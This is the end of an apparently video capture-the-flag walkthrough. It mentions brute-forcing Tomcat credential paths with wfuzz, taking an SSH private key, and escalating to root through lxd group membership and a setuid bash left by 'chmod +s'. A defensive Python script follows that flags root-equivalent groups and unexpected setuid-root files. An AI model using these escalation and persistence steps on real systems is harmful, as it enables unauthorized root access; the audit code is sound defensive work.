So that was that, and there were a lot of fumbles and fails, and this video took way longer than it needed to. If you wanted to, I guess you could move into the .ssh and grab that private key, or write your own, or do whatever. But that's it. That was all the gimmicks and gotchas there. The hardest part for me was finding that location that the Tomcat credentials would be; trying to find that specific path for this Tomcat version was an absolute pain. But I hope using wfuzz to be able to kind of just brute-force it and find it, maybe that was kind of cool, maybe that was kind of fun. So I hope you enjoyed this video. Thank you so much for watching. If you did like this video, please do the YouTube algorithm stuff, maybe like the video, type a little comment, subscribe, and I'd be super duper grateful. But thank you, thank you, thank you for watching this video, and I'll see you guys in the next one. Take care.
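Two host-side conditions carried the whole privilege escalation: an ordinary user sitting in the lxd group, and, afterwards, a setuid-root /bin/bash left behind by the chmod +s. Both are things a host audit can catch in seconds. The following Python is an added example, not code from the video, pwncat or LinPEAS: it parses /etc/group text for membership in root-equivalent groups and checks a list of file modes for setuid-root binaries that are not in an expected baseline, tagging shells separately. The /etc/group content, the file list and the baseline are constructed for this example (a real audit would read the live file and os.stat each path); the group and shell lists and the function names are my own choices.

```python
import stat

# Constructed /etc/group content standing in for the target's file; the lxd
# line mirrors what the id command showed for ash in the walkthrough.
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
lxd:x:116:ash
docker:x:998:
ash:x:1000:
"""

# Constructed listing as (path, st_mode, owner uid) tuples; a live audit
# would build this with os.stat. 0o4755 on /bin/bash is the state that the
# chmod +s in the walkthrough leaves behind.
SAMPLE_FILES = [
    ("/bin/bash", stat.S_IFREG | 0o4755, 0),
    ("/usr/bin/sudo", stat.S_IFREG | 0o4755, 0),
    ("/usr/bin/ping", stat.S_IFREG | 0o755, 0),
    ("/usr/bin/passwd", stat.S_IFREG | 0o4755, 0),
]

# Groups whose membership is effectively root on most distributions
# (assumption: adjust for the host in question).
ROOT_EQUIV_GROUPS = {"lxd", "docker", "disk", "sudo", "wheel"}
# Shells and interpreters that should never be setuid-root.
SHELLS = {"bash", "sh", "dash", "zsh", "python3", "perl"}
# setuid-root binaries expected on a stock install; a real baseline comes
# from a known-good system or the package database, not a hand-typed set.
EXPECTED_SETUID = {"/usr/bin/sudo", "/usr/bin/passwd"}


def parse_group(text):
    """Map group name -> set of member usernames from /etc/group text."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, _gid, members = line.split(":", 3)
        groups[name] = {m for m in members.split(",") if m}
    return groups


def risky_memberships(text):
    """Return sorted (user, group) pairs for users in root-equivalent groups."""
    found = []
    for group, members in parse_group(text).items():
        if group in ROOT_EQUIV_GROUPS:
            found.extend((user, group) for user in members)
    return sorted(found)


def unexpected_setuid(files):
    """Return (path, kind) for setuid-root files outside the baseline; shells
    are tagged separately because they hand out a root shell directly."""
    findings = []
    for path, mode, uid in files:
        if uid == 0 and mode & stat.S_ISUID and path not in EXPECTED_SETUID:
            name = path.rsplit("/", 1)[-1]
            kind = "setuid-shell" if name in SHELLS else "setuid-unexpected"
            findings.append((path, kind))
    return findings


if __name__ == "__main__":
    print("root-equivalent group members:", risky_memberships(SAMPLE_GROUP))
    print("unexpected setuid-root files:", unexpected_setuid(SAMPLE_FILES))
```

Run periodically (or from a file-integrity tool that already tracks mode bits), the second check turns the chmod +s step into an alert rather than a persistent backdoor; the first is the one to run before a box is handed to users at all, since lxd membership is root by design.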